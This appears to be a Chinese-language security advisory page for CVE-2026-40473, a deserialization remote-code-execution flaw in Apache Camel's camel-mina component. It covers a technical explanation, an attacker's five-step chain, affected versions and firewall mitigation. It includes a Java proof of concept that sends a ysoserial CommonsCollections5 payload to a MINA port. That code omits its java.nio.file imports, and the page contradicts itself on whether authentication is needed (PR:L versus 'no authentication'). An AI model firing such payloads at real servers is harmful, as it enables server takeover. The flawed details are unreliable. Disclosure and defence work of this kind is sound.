CVE-2026-40473 CVSS 8.8 高危

CVE-2026-40473 Apache Camel反序列化RCE漏洞

披露日期: 2026-04-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-40473

漏洞类型

反序列化漏洞

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Apache Camel

漏洞概述

Apache Camel的camel-mina组件存在严重的反序列化漏洞。由于MinaConverter在将IoBuffer转换为ObjectInput时，未应用ObjectInputFilter或类加载限制，攻击者可利用该漏洞。当Camel路由使用camel-mina作为TCP或UDP消费者并尝试转换消息体时，攻击者发送恶意构造的序列化Java对象，即可在应用程序上下文中触发任意代码执行。

技术细节

该漏洞的核心在于camel-mina组件中的MinaConverter.toObjectInput(IoBuffer)方法实现存在安全缺陷。该方法直接将网络接收到的IoBuffer对象包装在java.io.ObjectInputStream中，且未设置任何反序列化过滤器（ObjectInputFilter）或类白名单机制。在受影响版本中，若Camel路由配置了camel-mina作为TCP或UDP端点，并使用了getBody(ObjectInput.class)或@Body ObjectInput等方式获取消息体，系统会自动触发反序列化过程。攻击者无需认证即可向开放端口发送特制的恶意序列化数据。由于缺乏校验，恶意数据在readObject()解析时，会利用Java反序列化链（如CommonsCollections等）加载并执行任意代码，从而完全控制服务器。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络，识别出使用Apache Camel且开启了camel-mina组件（TCP/UDP端口）的目标服务。

STEP 2

2. 构造载荷

攻击者利用ysoserial等工具生成基于CommonsCollections或其他利用链的恶意Java序列化对象。

STEP 3

3. 发送请求

攻击者通过网络将恶意序列化数据包发送到目标MINA组件监听的端口。

STEP 4

4. 触发漏洞

目标应用接收到数据后，MinaConverter将其转换为ObjectInput，调用readObject()进行反序列化。

STEP 5

5. 执行代码

由于缺乏过滤，恶意对象被实例化，攻击者指定的任意命令在服务器端执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import java.io.*;
import java.net.*;

// PoC for CVE-2026-40473: Apache Camel Mina Deserialization RCE
// This PoC sends a malicious serialized Java object to a vulnerable MINA endpoint.

public class CVE202640473_PoC {
    public static void main(String[] args) {
        String targetHost = "127.0.0.1"; // Target IP
        int targetPort = 8888;           // Target Port (TCP/UDP)

        try {
            // 1. Generate malicious payload (using ysoserial for example)
            // Command: java -jar ysoserial.jar CommonsCollections5 "calc.exe" > payload.bin
            byte[] payload = Files.readAllBytes(Paths.get("payload.bin"));

            // 2. Establish connection to the vulnerable Camel MINA consumer
            Socket socket = new Socket(targetHost, targetPort);
            OutputStream outputStream = socket.getOutputStream();

            // 3. Send the malicious serialized object
            outputStream.write(payload);
            outputStream.flush();

            System.out.println("[+] Payload sent to " + targetHost + ":" + targetPort);
            socket.close();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

影响范围

Apache Camel >= 3.0.0, < 4.14.6

Apache Camel >= 4.15.0, < 4.18.2

Apache Camel >= 4.19.0, < 4.20.0

防御指南

临时缓解措施

若无法立即升级，建议在网络层面限制对camel-mina端口的访问来源（如使用防火墙白名单），仅允许受信任的IP连接，或者临时禁用相关的TCP/UDP消费者端点。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表